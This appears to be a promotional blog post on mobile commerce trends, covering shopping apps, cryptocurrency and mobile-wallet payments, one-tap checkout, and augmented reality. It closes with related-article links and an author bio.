Ecommerce development solely pertains to smartphones and tablets, to put it more precisely. It is simpler for a user to do mobile shopping thanks to the speed, ease, and creative route of a mobile application.

Additionally, by offering customers the greatest e-commerce app development services, mobile e-commerce apps or websites allow them access. Additionally, it enables consumers to shop and explore from anywhere.

**Trends in Mcommerce That are Effective for Interacting with Mobile Users**

**Using Mobile Applications to Shop**

According to Google, over the last two years, digital innovation in the retail industry has grown quickly, with the percentage of channel-agnostic shoppers rising from 65% to 73%. Lockdown limitations implemented globally have resulted in a 20% increase in time spent within mobile applications for retail apps. Many businesses then relocated the services their applications provided.

In this technologically evolved world, mobile apps are becoming a far more major part of the channel mix for retailers, so it’s important to understand how they may help you serve your customers in new ways and expand your company. especially at a time of social distance and unpredictability.

**Cryptocurrency Payments**

In 2024, it is anticipated that the cryptocurrency market would be worth $1.40 billion. Instantaneous digital payments are simplified and extremely secure because of crypto’s enhancements to portability and interoperability with QR codes.

With the help of cryptocurrency payments, firms can easily accept numerous currencies on mobile retail applications throughout the globe in a safe, personalized wallet. When making purchases through a mobile retail app, customers use rapid, secure mobile wallets like Apple Pay or Android Pay.

**High Mobile Phone Sales Volumes**

In 2022, smartphones and mobile shopping will unquestionably rule the eCommerce industry. Not all surfing is done on mobile websites and applications. Additionally, they are making purchases on their phones. A mobile app often generates sales worth $102 on average, compared to $92 for mobile websites.

iPads and tablets may also be used to access these applications and websites. However, starting in 2019, these gadgets’ sales have been declining. Depending on the device they are using, you may select how to communicate your marketing messaging to them. 

**Simple Ordering**

Numerous major firms are already working in this area to take advantage of the growing possibility in the m-commerce market as mobile commerce gains popularity. It is essential to provide your consumers with a better user experience and a smooth checkout procedure if you want to remain ahead of the competition.

Modern consumers want simple, fast methods of buying. Every time they wish to make a purchase, forcing your consumers to manually input all of their information may cause them to exit the basket. 

Shopping cart abandonment rates on mobile websites are higher because mobile applications often provide a better checkout experience than mobile websites.

**Virtual Reality and Augmented Reality**

Online consumers may digitally “try on” or “experience” the things they are interested in purchasing with the use of augmented reality, which is an excellent use of technology.

AR dramatically changes how you browse, and as a result, many businesses today, like IKEA, Gucci, and others, heavily rely on Augmented Reality (AR) technology to provide amusement and inspiration. The integration of online and offline shopping experiences is made possible by virtual reality, which improves the buying experience for the consumer.

**Conclusion**

For the foreseeable future, mobile trends will continue to greatly impact the e-commerce sector. You must maintain a close watch on mobile commerce developments as an owner of an e-commerce shop in order to make the necessary plans.

Making a mobile app for your e-commerce website is the simplest method to stay current with new technology and the times. In 2022, customers will choose to buy in this manner.

1.  How Traffic Analysis Boosts Ecommerce Profits
2.  How Technology Can Help Your Business Succeed
3.  Top Data-Driven Methods for Improving Your Investment Decisions
4.  Development of Corporate Applications Based on Artificial Intelligence
5.  Recent Mobile Payment Trends And How They Are Shaping The Future

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Tag

#intel